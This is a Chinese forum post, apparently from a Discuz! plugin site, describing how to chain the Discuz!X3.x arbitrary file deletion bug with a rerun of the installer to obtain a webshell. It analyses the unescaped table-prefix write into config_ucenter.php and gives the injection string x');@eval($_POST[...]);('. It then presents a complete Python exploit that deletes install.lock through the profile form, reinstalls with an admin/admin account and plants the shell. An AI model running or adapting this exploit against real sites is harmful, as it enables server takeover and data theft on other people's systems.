·设为首页收藏本站📧邮箱修改🎁免费下载专区💎积分✅卡密📒收藏夹👽聊天室
返回列表 发布新帖

[BUG反馈] Discuz!X3.x任意文件删除配合install过程getshell

2253 0
发表于 2020-8-10 09:19:01 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
1、简述
这个方法是看到一篇博客分析的,主要是利用文件删除漏洞删掉install.lock文件,绕过对安装完成的判断能够再进行安装的过程,然后再填写配置信息处构使用构造的表前缀名,时一句话写入配置文件中,getshell。
表前缀:x');@eval($_POST[lanvnal]);('
但是我在使用上面版本v3.4的代码时发现,安装后install目录下不存在index.php了。分析代码发现会有安装后的删除处理,在/source/admincp/admincp_index.php的第14行:
  1. if(@file_exists(DISCUZ_ROOT.'./install/index.php') && !DISCUZ_DEBUG) {
  2.     @unlink(DISCUZ_ROOT.'./install/index.php');
  3.     if(@file_exists(DISCUZ_ROOT.'./install/index.php')) {
  4.         dexit('Please delete install/index.php via FTP!');
  5.     }
  6. }
复制代码

那是不是老版本存在该问题呢?
我翻了历史版本代码,直到git提交的第一个版本都有如上的处理。
但还是分析一下吧,就当学习了。
可以利用的条件:1、安装后没有登录后台,此时install/index还没删除 2、因为其他原因没有删除
2、复现环境
同上
3、漏洞复现
如果安装后install/index.php因为某些原因还存在,直接访问会有如下警告:
Discuz!X3.x任意文件删除配合install过程getshell 任意,文件,删除,install,漏洞

通过文件删除漏洞删除data目录下的install.lock文件就可以重新安装。
安装过程修改表前缀内容为:x');@eval($_POST[lanvnal]);('
Discuz!X3.x任意文件删除配合install过程getshell 任意,文件,删除,install,漏洞

在config/config_ucenter.php中已经写入了webshell。
Discuz!X3.x任意文件删除配合install过程getshell 任意,文件,删除,install,漏洞
Discuz!X3.x任意文件删除配合install过程getshell 任意,文件,删除,install,漏洞

4、漏洞分析
分析一下安装逻辑,install/index.php文件的整体流程如下:
Discuz!X3.x任意文件删除配合install过程getshell 任意,文件,删除,install,漏洞

分别是我们安装的每一步,接受协议->环境检测->是否安装 UCenter Server->数据库配置信息->安装过程,生成lock文件->检查
问题出在在 db_init 的处理中,在代码第369行:
  1. if(DZUCFULL) {
  2.             install_uc_server();
  3.         }
复制代码

跟进install_uc_server,在1296行可以发现对config参数没做任何过滤传入到save_uc_config中:
  1. save_uc_config($config, ROOT_PATH.'./config/config_ucenter.php');
复制代码

然后save_uc_config也没做任何安全处理,就拼接参数后写入文件:

  1. function save_uc_config($config, $file) {

  2.     $success = false;

  3.     list($appauthkey, $appid, $ucdbhost, $ucdbname, $ucdbuser, $ucdbpw, $ucdbcharset, $uctablepre, $uccharset, $ucapi, $ucip) = $config;

  4.     $link = function_exists('mysql_connect') ? mysql_connect($ucdbhost, $ucdbuser, $ucdbpw, 1) : new mysqli($ucdbhost, $ucdbuser, $ucdbpw, $ucdbname);
  5.     $uc_connnect = $link ? 'mysql' : '';

  6.     $date = gmdate("Y-m-d H:i:s", time() + 3600 * 8);
  7.     $year = date('Y');
  8.     $config = <<<EOT
  9. <?php


  10. define('UC_CONNECT', '$uc_connnect');

  11. define('UC_DBHOST', '$ucdbhost');
  12. define('UC_DBUSER', '$ucdbuser');
  13. define('UC_DBPW', '$ucdbpw');
  14. define('UC_DBNAME', '$ucdbname');
  15. define('UC_DBCHARSET', '$ucdbcharset');
  16. define('UC_DBTABLEPRE', '`$ucdbname`.$uctablepre');
  17. define('UC_DBCONNECT', 0);

  18. define('UC_CHARSET', '$uccharset');
  19. define('UC_KEY', '$appauthkey');
  20. define('UC_API', '$ucapi');
  21. define('UC_APPID', '$appid');
  22. define('UC_IP', '$ucip');
  23. define('UC_PPP', 20);
  24. ?>
  25. EOT;

  26.     if($fp = fopen($file, 'w')) {
  27.         fwrite($fp, $config);
  28.         fclose($fp);
  29.         $success = true;
  30.     }
  31.     return $success;
  32. }
复制代码

因为 dbhost, dbuser等参数需要用来连接数据库,所以利用 tablepre 向配置文件写入shell。
5、Exp

  1. #!/usr/bin/env python3
  2. import base64
  3. import random
  4. import re
  5. import string

  6. import requests

  7. sess = requests.Session()
  8. randstr = lambda len=5: ''.join(random.choice(string.ascii_lowercase) for _ in range(len))

  9. ##################################################
  10. ########## Customize these parameters ############
  11. target = 'http://localhost/discuzx'
  12. # login target site first, and copy the cookie here
  13. cookie = "UM_distinctid=15bcd2339e93d6-07b5ae8b41447e-8373f6a-13c680-15bcd2339ea636; CNZZDATA1261218610=1456502094-1493792949-%7C1494255360; csrftoken=NotKIwodOQHO0gdMyCAxpMuObjs5RGdeEVxRlaGoRdOEeMSVRL0sfeTBqnlMjtlZ; Zy4Q_2132_saltkey=I9b3k299; Zy4Q_2132_lastvisit=1506763258; Zy4Q_2132_ulastactivity=0adb6Y1baPukQGRVYtBOZB3wmx4nVBRonRprfYWTiUaEbYlKzFWL; Zy4Q_2132_nofavfid=1; Zy4Q_2132_sid=rsQrgQ; Zy4Q_2132_lastact=1506787935%09home.php%09misc; 7Csx_2132_saltkey=U8nrO8Xr; TMT0_2132_saltkey=E3q5BpyX; PXMk_2132_saltkey=rGBnNWu7; b4Gi_2132_saltkey=adC4r05k; b4Gi_2132_lastvisit=1506796139; b4Gi_2132_onlineusernum=2; b4Gi_2132_sendmail=1; b4Gi_2132_seccode=1.8dab0a0c4ebfda651b; b4Gi_2132_sid=BywqMy; b4Gi_2132_ulastactivity=51c0lBFHqkUpD3mClFKDxwP%2BI0JGaY88XWTT1qtFBD6jAJUMphOL; b4Gi_2132_auth=6ebc2wCixg7l%2F6No7r54FCvtNKfp1e5%2FAdz2SlLqJRBimNpgrbxhSEnsH5%2BgP2mAvwVxOdrrpVVX3W5PqDhf; b4Gi_2132_creditnotice=0D0D2D0D0D0D0D0D0D1; b4Gi_2132_creditbase=0D0D0D0D0D0D0D0D0; b4Gi_2132_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; b4Gi_2132_lastcheckfeed=1%7C1506800134; b4Gi_2132_checkfollow=1; b4Gi_2132_lastact=1506800134%09misc.php%09seccode"
  14. shell_password = randstr()
  15. db_host = ''
  16. db_user = ''
  17. db_pw = ''
  18. db_name = ''
  19. #################################################

  20. path = '/home.php?mod=spacecp&ac=profile&op=base'
  21. url = target + path

  22. sess.headers.update({
  23.     'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
  24.     'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  25.     'Referer': url})


  26. # sess.proxies.update({'http': 'socks5://localhost:1080'})
  27. # sess.proxies.update({'http': 'http://localhost:8080'})


  28. def login(username=None, password=None):
  29.     sess.headers.update({'Cookie': cookie})


  30. def get_form_hash():
  31.     r = sess.get(url)
  32.     match = re.search(r'"member.php\?mod=logging&action=logout&formhash=(.*?)"', r.text, re.I)
  33.     if match:
  34.         return match.group(1)


  35. def tamper(formhash, file_to_delete):
  36.     data = {
  37.         'formhash': (None, formhash),
  38.         'profilesubmit': (None, 'true'),
  39.         'birthprovince': (None, file_to_delete)
  40.     }
  41.     r = sess.post(url, files=data)
  42.     if 'parent.show_success' in r.text:
  43.         print('tamperred successfully')
  44.         return True


  45. def delete(formhash, file):
  46.     if not tamper(formhash, file):
  47.         return False

  48.     image = b'iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAADUlEQVR4nGNgGAWkAwABNgABVtF/yAAAAABJRU5ErkJggg=='
  49.     data = {
  50.         'formhash': formhash,
  51.         'profilesubmit': 'true'
  52.     }
  53.     files = {
  54.         'birthprovince': ('image.png', base64.b64decode(image), 'image/png')
  55.     }
  56.     r = sess.post(url, data=data, files=files)
  57.     if 'parent.show_success' in r.text:
  58.         print('delete {} successfully'.format(file))
  59.         return True


  60. def getshell():
  61.     install_url = target + '/install/index.php'
  62.     r = sess.get(install_url)
  63.     if '安装向导' not in r.text:
  64.         print('install directory not exists')
  65.         return False

  66.     table_prefix = "x');@eval($_POST[{}]);('".format(shell_password)
  67.     data = {
  68.         'step': 3,
  69.         'install_ucenter': 'yes',
  70.         'dbinfo[dbhost]': db_host,
  71.         'dbinfo[dbname]': db_name,
  72.         'dbinfo[dbuser]': db_user,
  73.         'dbinfo[dbpw]': db_pw,
  74.         'dbinfo[tablepre]': table_prefix,
  75.         'dbinfo[adminemail]': 'admin@admin.com',
  76.         'admininfo[username]': 'admin',
  77.         'admininfo[password]': 'admin',
  78.         'admininfo[password2]': 'admin',
  79.         'admininfo[email]': 'admin@admin.com',
  80.     }
  81.     r = sess.post(install_url, data=data)
  82.     if '建立数据表 CREATE TABLE' not in r.text:
  83.         print('write shell failed')
  84.         return False
  85.     print('shell: {}/config/config_ucenter.php'.format(target))
  86.     print('password: {}'.format(shell_password))


  87. if __name__ == '__main__':
  88.     login()
  89.     form_hash = get_form_hash()
  90.     if form_hash:
  91.         delete(form_hash, '../../../data/install.lock')
  92.         getshell()
  93.     else:
  94.         print('failed')
复制代码


我要说一句 收起回复
一花一世界,一叶一追寻。一曲一场叹,一生为一人。

回复

 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

创宇盾启航版免费网站防御网站加速服务
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:18.218.189.173,GMT+8, 2024-11-5 21:58 , Processed in 0.912877 second(s), 78 queries , Gzip On, Redis On.

Powered by Discuz! X5.0 Licensed

© 2001-2024 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
QQ客服返回顶部
快速回复 返回顶部 返回列表